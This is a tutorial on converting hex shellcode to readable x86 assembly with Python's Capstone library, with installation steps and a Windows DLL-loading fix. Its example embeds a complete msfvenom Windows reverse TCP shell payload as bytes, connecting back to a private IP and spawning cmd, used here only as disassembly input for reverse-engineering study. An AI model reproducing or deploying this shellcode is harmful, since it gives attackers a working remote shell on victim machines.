"Python" uses Python to convert Shellcode into a compilation

Source: Internet
Author: User
Tags: python script kali linux

1. Introduction

How many lines of code do you need to convert hex into assembly?
Thanks to the Python bindings of the Capstone library, only a handful of lines are needed.
During exploit development or reverse engineering you often need to turn a blob of hex shellcode into readable assembly quickly. You can load it into a full disassembler such as OllyDbg or IDA Pro, but if you do not want to fire up a heavyweight tool for such a small task, the following Python script converts the shellcode into its disassembly.

If Capstone is not installed yet, install it using one of the following methods:

2. Installation

2.1 Debian-based

Download and install with the following command.
Note: Kali Linux already ships with it.

    apt-get install python-capstone

python-capstone is the Python 2 package; on a current system with Python 3 use the python3-capstone package or `pip install capstone` (the pip wheel bundles the native library, so no separate libcapstone is needed).
2.2 Windows-based

On Windows, download the MSI that matches your Python build (32-bit or 64-bit; a mismatch makes the DLL fail to load) and run the graphical installer:

32-bit

https://github.com/aquynh/capstone/releases/download/3.0.5-rc2/capstone-3.0.5-rc2-python-win32.msi

64-bit

https://github.com/aquynh/capstone/releases/download/3.0.5-rc2/capstone-3.0.5-rc2-python-win64.msi
3. Example

The shellcode in this example is a Windows reverse TCP shell payload generated with msfvenom (324 bytes).

    #!/usr/bin/env python
    from capstone import *

    # Bytes literals work on both Python 2 and Python 3; a plain "..." literal
    # becomes a text string on Python 3 and disasm() rejects it.
    shellcode =  b""
    shellcode += b"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b"
    shellcode += b"\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7"
    shellcode += b"\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf"
    shellcode += b"\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c"
    shellcode += b"\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01"
    shellcode += b"\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31"
    shellcode += b"\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d"
    shellcode += b"\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66"
    shellcode += b"\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0"
    shellcode += b"\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f"
    shellcode += b"\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68"
    shellcode += b"\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8"
    shellcode += b"\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00"
    shellcode += b"\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f"
    shellcode += b"\xdf\xe0\xff\xd5\x97\x6a\x05\x68\xc0\xa8\x74\x80\x68"
    shellcode += b"\x02\x00\x1f\x90\x89\xe6\x6a\x10\x56\x57\x68\x99\xa5"
    shellcode += b"\x74\x61\xff\xd5\x85\xc0\x74\x0c\xff\x4e\x08\x75\xec"
    shellcode += b"\x68\xf0\xb5\xa2\x56\xff\xd5\x68\x63\x6d\x64\x00\x89"
    shellcode += b"\xe3\x57\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66"
    shellcode += b"\xc7\x44\x24\x3c\x01\x01\x8d\x44\x24\x10\xc6\x00\x44"
    shellcode += b"\x54\x50\x56\x56\x56\x46\x56\x4e\x56\x56\x53\x56\x68"
    shellcode += b"\x79\xcc\x3f\x86\xff\xd5\x89\xe0\x4e\x56\x46\xff\x30"
    shellcode += b"\x68\x08\x87\x1d\x60\xff\xd5\xbb\xaa\xc5\xe2\x5d\x68"
    shellcode += b"\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0"
    shellcode += b"\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5"

    # Create a disassembler for 32-bit x86 and decode the buffer as if it were
    # loaded at address 0, printing one instruction per line.
    md = Cs(CS_ARCH_X86, CS_MODE_32)
    for i in md.disasm(shellcode, 0x00):
        print("0x%x:\t%s\t%s" % (i.address, i.mnemonic, i.op_str))

Code explanation:

md = Cs(CS_ARCH_X86, CS_MODE_32): creates the disassembler object; the two parameters are the hardware architecture and the hardware mode (here 32-bit x86).

for i in md.disasm(shellcode, 0x00): disasm disassembles the hex bytes; its parameters are the shellcode and the start address that the first instruction is assumed to sit at.

print("0x%x:\t%s\t%s" % (i.address, i.mnemonic, i.op_str)): prints the address, the mnemonic and the operand string of each instruction.
4. Results

Save the code above and run it; the screenshot below shows the disassembly of the hex shellcode produced by the Python script.

Figure: Converting hex to disassembly with a simple Python script

5. Practice part

I ran into an error after installing Capstone on Windows.
The error message is as follows:

    Traceback (most recent call last):
      File "sl.py", line 2, in <module>
        from capstone import *
      File "C:\Python27\lib\site-packages\capstone\__init__.py", line 249, in <module>
        raise ImportError("ERROR: fail to load the dynamic library.")
    ImportError: ERROR: fail to load the dynamic library.

Stepping through the module, I found that the failure happens when ctypes loads the DLL; I did not find out why.

C:\Python27\Lib\site-packages\capstone\__init__.py

So I changed the library path at line 210 of that file to the absolute path of the DLL:

    _lib = "capstone.dll"  # before
    _lib = "C:\\Python27\\lib\\site-packages\\capstone\\lib\\capstone.dll"  # after

The modified code is as follows:

    if sys.platform == 'darwin':
        _lib = "libcapstone.dylib"
    elif sys.platform in ('win32', 'cygwin'):
        _lib = "C:\\Python27\\lib\\site-packages\\capstone\\lib\\capstone.dll"
    else:
        _lib = "libcapstone.so"

Note that this edit lives inside the installed package, so it is lost the next time Capstone is reinstalled or upgraded; before patching, check that the MSI's bitness matches the Python interpreter, since a 32-bit Python cannot load a 64-bit capstone.dll and fails with the same error.
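Rather than patching the installed package, the following added diagnostic (written for this page, not part of the original post or of Capstone itself) reproduces the ctypes lookup in isolation: it tries each candidate path with ctypes.cdll.LoadLibrary and records the OSError for every failure, so the real reason (wrong path, a 64-bit DLL under a 32-bit Python, a missing dependency) is visible instead of the generic "fail to load the dynamic library". The platform names mirror the snippet above; the candidate order, the lib/ subdirectory and the site-packages fallback path are this script's assumptions, not Capstone's loader logic.

```python
"""Probe which shared-library path ctypes can actually load.

Added diagnostic for the "ERROR: fail to load the dynamic library" ImportError;
not part of the original post or of the Capstone package.
"""
import ctypes
import os
import sys


def library_name():
    """Platform-specific file name, mirroring the names in capstone/__init__.py."""
    if sys.platform == "darwin":
        return "libcapstone.dylib"
    if sys.platform in ("win32", "cygwin"):
        return "capstone.dll"
    return "libcapstone.so"


def candidate_paths(package_dir, name=None):
    """Candidate locations, in this script's own order (an assumption, not Capstone's):
    the package's lib/ directory first (the path the post hard-codes), then the
    bare name so the platform loader searches PATH / LD_LIBRARY_PATH."""
    name = name or library_name()
    return [os.path.join(package_dir, "lib", name), name]


def probe_library(candidates):
    """Try each path with ctypes.

    Returns (first path that loaded or None, {path: error message}) so the
    caller sees every failure reason, not just the last one.
    """
    errors = {}
    for path in candidates:
        try:
            ctypes.cdll.LoadLibrary(path)
            return path, errors
        except OSError as exc:
            errors[path] = str(exc)
    return None, errors


def main():
    try:
        import capstone  # only used to locate the installed package directory
        package_dir = os.path.dirname(capstone.__file__)
    except ImportError:
        # Fallback when the import itself fails (assumed layout of a standard install).
        package_dir = os.path.join(os.path.dirname(os.__file__), "site-packages", "capstone")
    loaded, errors = probe_library(candidate_paths(package_dir))
    for path, err in errors.items():
        print("FAILED %s: %s" % (path, err))
    print("loaded: %s" % loaded)
    return 0 if loaded else 1


if __name__ == "__main__":
    sys.exit(main())
```

Run it with the same interpreter that fails to import Capstone; the per-path error text is what the package's generic ImportError hides.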
6. Results after the fix

7. Reference
https://haiderm.com/convert-hex-assembly-using-simple-python-script/

"Python" uses Python to convert Shellcode into a compilation

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.
